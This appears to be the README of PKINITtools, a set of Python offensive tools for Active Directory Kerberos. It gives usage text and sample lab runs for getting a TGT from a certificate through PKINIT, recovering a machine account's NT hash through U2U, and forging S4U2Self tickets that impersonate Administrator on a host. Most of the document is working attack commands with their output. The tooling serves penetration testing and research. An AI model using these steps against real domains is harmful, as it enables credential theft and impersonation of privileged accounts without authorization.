This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context:
These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:
git clone
pip3 install impacket minikerberos
Using a virtualenv for this is recommended.
Request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the tool. Usage example:
(PKINITtools) user@localhost:~/PKINITtools$ python -h
usage: [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
domain/username ccache
Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key
positional arguments:
domain/username Domain and username in the cert
ccache ccache file to store the TGT in
optional arguments:
-h, --help show this help message and exit
-cert-pfx file PFX file
-pfx-pass password PFX file password
-pfx-base64 BASE64 PFX file as base64 string
-cert-pem file Certificate in PEM format
-key-pem file Private key file in PEM format
-dc-ip DC_IP DC IP or hostname to use as KDC
-v, --verbose
(PKINITtools) user@localhost:~/PKINITtools$ python testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO Saved TGT to file
Use Kerberos U2U to submit a TGS request for yourself. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT. It's magic really. This tool requires a TGT resulting from PKINIT to be in your KRB5CCNAME
env variable. Usage:
(PKINITtools) user@localhost:~/PKINITtools$ python -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
usage: [-h] -key KEY [-dc-ip ip address] [-debug] identity
positional arguments:
identity domain/username
optional arguments:
-h, --help show this help message and exit
-key KEY AS REP key from
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-debug Turn DEBUG output ON
(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url
. The only accepted kerberos_connection_url
for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]
. The SPN should be a service name on the host you are impersonating, you can't use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that). Usage:
(PKINITtools) user@localhost:~/PKINITtools$ python -h
usage: [-h] [-v] kerberos_connection_url spn targetuser ccache
Gets an S4U2self ticket impersonating given user
positional arguments:
the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
spn the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a
TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
ccache ccache file to store the TGT ticket in
optional arguments:
-h, --help show this help message and exit
-v, --verbose
(PKINITtools) user@localhost:~/PKINITtools$ python kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO Success!
2021-07-28 10:09:13,696 minikerberos INFO Done!
- SkelSec for minikerberos
- Alberto Solino and the team at SecureAuthCorp for impacket
- Mor Rubin for their first PKINIT implementation in python as part of AzureADJoinedMachinePTC
- Benjamin Delpy for implementing these things in kekeo